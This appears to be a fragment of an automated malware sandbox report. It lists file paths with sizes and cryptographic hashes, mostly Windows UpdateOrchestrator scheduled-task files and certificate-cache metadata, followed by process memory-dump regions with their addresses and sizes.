                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                          SHA1

                                                                                                                                                          98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                          SHA256

                                                                                                                                                          ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                          SHA512

                                                                                                                                                          c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          f313c5b4f95605026428425586317353

                                                                                                                                                          SHA1

                                                                                                                                                          06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                          SHA256

                                                                                                                                                          129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                          SHA512

                                                                                                                                                          b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                          SHA1

                                                                                                                                                          a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                          SHA256

                                                                                                                                                          98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                          SHA512

                                                                                                                                                          1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                          SHA1

                                                                                                                                                          63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                          SHA256

                                                                                                                                                          727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                          SHA512

                                                                                                                                                          f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                          SHA1

                                                                                                                                                          5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                          SHA256

                                                                                                                                                          55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                          SHA512

                                                                                                                                                          5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                          SHA1

                                                                                                                                                          9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                          SHA256

                                                                                                                                                          a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                          SHA512

                                                                                                                                                          c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                          Filesize

                                                                                                                                                          330B

                                                                                                                                                          MD5

                                                                                                                                                          5ce7657cc45587fbca5317b58bd6b209

                                                                                                                                                          SHA1

                                                                                                                                                          5a0bb1c287be6f3a0e180cdbb74c8f7ca8b24f63

                                                                                                                                                          SHA256

                                                                                                                                                          81b3bca4e958c0c8cc6384c4bfc702ca59b7e91293b89b2a37949e87583547ce

                                                                                                                                                          SHA512

                                                                                                                                                          53e6141cf9d55571b7350a4079ece7cbdb2776895bed527f12936ccbdbe8ff76a3b4b00edbc0f9559b11b1afc2546ac50faf0ec6263592766372a5c5188588f6

                                                                                                                                                        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                                                          Filesize

                                                                                                                                                          330B

                                                                                                                                                          MD5

                                                                                                                                                          2cd78b681bbc1daaa445b69860b188d8

                                                                                                                                                          SHA1

                                                                                                                                                          5dfb21eea2ccd94ad83789bbdffab1dbf4af83df

                                                                                                                                                          SHA256

                                                                                                                                                          ed3231479d352e74c1149bbf8f59da6de39e0b424dbc01b34ad2add826ae0ce7

                                                                                                                                                          SHA512

                                                                                                                                                          56f2224a1a5f97c054535b9057b6c3124690edfd986ba97a00ac0fded8cda0ec78fd2064f6b9417d736b264198c9641dcad7baf03511ea7b53c366b181bef723

                                                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                                                          Filesize

                                                                                                                                                          412B

                                                                                                                                                          MD5

                                                                                                                                                          d305e4e528f8d3e40454dd0894591724

                                                                                                                                                          SHA1

                                                                                                                                                          ea3760a3729960b9ebea82079c8b2d7c8e3058e8

                                                                                                                                                          SHA256

                                                                                                                                                          eaaafac7791df63db1faecd2f88724956b5a8dee5338580984e63c1d678ba7c2

                                                                                                                                                          SHA512

                                                                                                                                                          c28ddeefdc1a382b61e73481a56a17c19b93b0a5f8b1c01ffb1a0e0d233d6f896487eebcd4940bdc0f41baf29b9a646bf31f96bbcb4e7424790a8b177d5b33a2

                                                                                                                                                        • memory/388-103-0x000002655AD10000-0x000002655AD37000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          156KB

                                                                                                                                                        • memory/388-108-0x00007FF7F92D0000-0x00007FF7F92E0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/616-106-0x00007FF7F92D0000-0x00007FF7F92E0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/616-98-0x000001C225F20000-0x000001C225F42000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/616-102-0x000001C225F50000-0x000001C225F77000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          156KB

                                                                                                                                                        • memory/672-105-0x000001F94DF50000-0x000001F94DF77000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          156KB

                                                                                                                                                        • memory/672-119-0x00007FF7F92D0000-0x00007FF7F92E0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                        • memory/2532-94-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          128KB

                                                                                                                                                        • memory/2532-93-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          128KB

                                                                                                                                                        • memory/2636-35-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          24KB

                                                                                                                                                        • memory/2636-33-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          24KB

                                                                                                                                                        • memory/3580-24-0x0000022418E10000-0x0000022418E66000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          344KB

                                                                                                                                                        • memory/3580-17-0x0000022430000000-0x0000022430024000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          144KB

                                                                                                                                                        • memory/3580-26-0x0000022418ED0000-0x0000022418EF2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/3580-25-0x0000022418E70000-0x0000022418EC8000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          352KB

                                                                                                                                                        • memory/3580-4-0x00007FF818AD3000-0x00007FF818AD5000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/3580-14-0x0000022471C70000-0x0000022471C92000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/3580-15-0x00007FF818AD0000-0x00007FF819591000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/3580-381-0x00007FF818AD0000-0x00007FF819591000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/3580-27-0x00007FF839250000-0x00007FF839445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • memory/3580-1451-0x00007FF818AD0000-0x00007FF819591000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/3580-380-0x00007FF818AD3000-0x00007FF818AD5000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/3580-23-0x0000022418D60000-0x0000022418E06000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          664KB

                                                                                                                                                        • memory/3580-22-0x00007FF818AD0000-0x00007FF819591000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/3580-20-0x0000022418300000-0x0000022418D50000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.3MB

                                                                                                                                                        • memory/3580-18-0x00007FF839250000-0x00007FF839445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • memory/3580-19-0x00007FF839150000-0x00007FF83920E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          760KB

                                                                                                                                                        • memory/3580-29-0x00000224191B0000-0x00000224191BA000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          40KB

                                                                                                                                                        • memory/3580-16-0x00007FF818AD0000-0x00007FF819591000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/4432-95-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          160KB

                                                                                                                                                        • memory/4432-92-0x00007FF839150000-0x00007FF83920E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          760KB

                                                                                                                                                        • memory/4432-91-0x00007FF839250000-0x00007FF839445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • memory/4432-90-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          160KB

                                                                                                                                                        • memory/4432-89-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          160KB

                                                                                                                                                        • memory/4464-86-0x00007FF839250000-0x00007FF839445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • memory/4464-88-0x000001CE99780000-0x000001CE997B6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          216KB

                                                                                                                                                        • memory/4464-87-0x00007FF839150000-0x00007FF83920E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          760KB

                                                                                                                                                        • memory/4464-85-0x000001CE99470000-0x000001CE994BE000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          312KB

                                                                                                                                                        • memory/4464-84-0x000001CEFF6A0000-0x000001CEFF6DC000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          240KB

                                                                                                                                                        • memory/4464-74-0x000001CEFF9F0000-0x000001CEFFBB2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.8MB

                                                                                                                                                        • memory/4464-73-0x000001CEFF760000-0x000001CEFF812000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          712KB

                                                                                                                                                        • memory/4464-72-0x000001CEFF640000-0x000001CEFF690000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          320KB

                                                                                                                                                        • memory/4464-64-0x00007FF839250000-0x00007FF839445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • memory/4464-63-0x000001CEA19E0000-0x000001CEA1A92000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          712KB

                                                                                                                                                        • memory/4464-62-0x000001CEA15A0000-0x000001CEA19DE000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4.2MB

                                                                                                                                                        • memory/4464-61-0x000001CEA0DD0000-0x000001CEA159A000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          7.8MB

                                                                                                                                                        • memory/4464-60-0x000001CE98360000-0x000001CE988E4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          5.5MB

                                                                                                                                                        • memory/4464-58-0x00007FF839250000-0x00007FF839445000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • memory/4464-59-0x00007FF839150000-0x00007FF83920E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          760KB

                                                                                                                                                        • memory/5008-30-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          16KB

                                                                                                                                                        • memory/5008-32-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          16KB